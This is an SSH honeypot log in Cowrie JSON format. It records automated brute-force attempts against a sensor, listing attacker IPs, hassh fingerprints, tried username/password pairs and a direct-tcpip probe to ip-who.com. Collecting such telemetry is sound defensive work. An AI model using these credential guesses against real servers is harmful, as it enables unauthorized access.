h-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:07:41.575931Z","src_ip":"212.227.235.229","session":"a8ff1121ecd1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"trustix","message":"login attempt [admin/trustix] failed","sensor":"my-vps","timestamp":"2025-08-26T21:07:42.408391Z","src_ip":"212.227.235.229","session":"a8ff1121ecd1"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:07:43.681739Z","src_ip":"212.227.235.229","session":"a8ff1121ecd1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45178,"dst_ip":"1.2.3.4","dst_port":22,"session":"2208dfcf1671","protocol":"ssh","message":"New connection: 212.227.235.229:45178 (1.2.3.4:22) [session: 2208dfcf1671]","sensor":"my-vps","timestamp":"2025-08-26T21:07:57.927509Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:07:58.502250Z","src_ip":"212.227.235.229","session":"2208dfcf1671"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:08:00.095578Z","src_ip":"212.227.235.229","session":"2208dfcf1671"}
{"eventid":"cowrie.login.failed","username":"admin","password":"andrew","message":"login attempt [admin/andrew] failed","sensor":"my-vps","timestamp":"2025-08-26T21:08:01.671118Z","src_ip":"212.227.235.229","session":"2208dfcf1671"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:08:03.428945Z","src_ip":"212.227.235.229","session":"2208dfcf1671"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42182,"dst_ip":"1.2.3.4","dst_port":22,"session":"51655b99f1a1","protocol":"ssh","message":"New connection: 212.227.235.229:42182 (1.2.3.4:22) [session: 51655b99f1a1]","sensor":"my-vps","timestamp":"2025-08-26T21:08:09.471605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:08:09.829342Z","src_ip":"212.227.235.229","session":"51655b99f1a1"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:08:09.860769Z","src_ip":"212.227.235.229","session":"51655b99f1a1"}
{"eventid":"cowrie.login.success","username":"root","password":"libreelec","message":"login attempt [root/libreelec] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:08:12.402782Z","src_ip":"212.227.235.229","session":"51655b99f1a1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T21:08:12.659563Z","session":"51655b99f1a1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:08:12.917465Z","src_ip":"212.227.235.229","session":"51655b99f1a1"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:08:13.185752Z","src_ip":"212.227.235.229","session":"51655b99f1a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42190,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e344c2804de","protocol":"ssh","message":"New connection: 212.227.235.229:42190 (1.2.3.4:22) [session: 0e344c2804de]","sensor":"my-vps","timestamp":"2025-08-26T21:08:13.244665Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:08:13.299700Z","src_ip":"212.227.235.229","session":"0e344c2804de"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:08:13.538019Z","src_ip":"212.227.235.229","session":"0e344c2804de"}
{"eventid":"cowrie.session.connect","src_ip":"211.119.11.203","src_port":36514,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2f157fe1149","protocol":"ssh","message":"New connection: 211.119.11.203:36514 (1.2.3.4:22) [session: a2f157fe1149]","sensor":"my-vps","timestamp":"2025-08-26T21:08:14.131758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:08:14.132575Z","src_ip":"211.119.11.203","session":"a2f157fe1149"}
{"eventid":"cowrie.client.kex","hassh":"98ddc5604ef6a1006a2b49a58759fbe6","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98ddc5604ef6a1006a2b49a58759fbe6","sensor":"my-vps","timestamp":"2025-08-26T21:08:14.376103Z","src_ip":"211.119.11.203","session":"a2f157fe1149"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu","message":"login attempt [root/ubuntu] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:08:15.107774Z","src_ip":"211.119.11.203","session":"a2f157fe1149"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42196,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9f28bf733be","protocol":"ssh","message":"New connection: 212.227.235.229:42196 (1.2.3.4:22) [session: b9f28bf733be]","sensor":"my-vps","timestamp":"2025-08-26T21:08:16.869904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:08:17.030889Z","src_ip":"212.227.235.229","session":"b9f28bf733be"}
{"eventid":"cowrie.login.success","username":"root","password":"welc0me","message":"login attempt [root/welc0me] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:08:18.125752Z","src_ip":"212.227.235.229","session":"0e344c2804de"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T21:08:18.449200Z","session":"0e344c2804de"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:08:18.713189Z","src_ip":"212.227.235.229","session":"0e344c2804de"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:08:19.067285Z","src_ip":"212.227.235.229","session":"b9f28bf733be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45714,"dst_ip":"1.2.3.4","dst_port":22,"session":"28dacc161c13","protocol":"ssh","message":"New connection: 212.227.235.229:45714 (1.2.3.4:22) [session: 28dacc161c13]","sensor":"my-vps","timestamp":"2025-08-26T21:08:19.541163Z"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:08:19.592737Z","src_ip":"212.227.235.229","session":"0e344c2804de"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:08:19.690912Z","src_ip":"212.227.235.229","session":"28dacc161c13"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:08:19.796075Z","src_ip":"212.227.235.229","session":"28dacc161c13"}
{"eventid":"cowrie.login.failed","username":"psybnc","password":"psybnc","message":"login attempt [psybnc/psybnc] failed","sensor":"my-vps","timestamp":"2025-08-26T21:08:20.899862Z","src_ip":"212.227.235.229","session":"b9f28bf733be"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:08:22.691607Z","src_ip":"212.227.235.229","session":"b9f28bf733be"}
{"eventid":"cowrie.login.failed","username":"helpdesk","password":"helpdesk","message":"login attempt [helpdesk/helpdesk] failed","sensor":"my-vps","timestamp":"2025-08-26T21:08:27.165019Z","src_ip":"212.227.235.229","session":"28dacc161c13"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:08:28.727453Z","src_ip":"212.227.235.229","session":"28dacc161c13"}
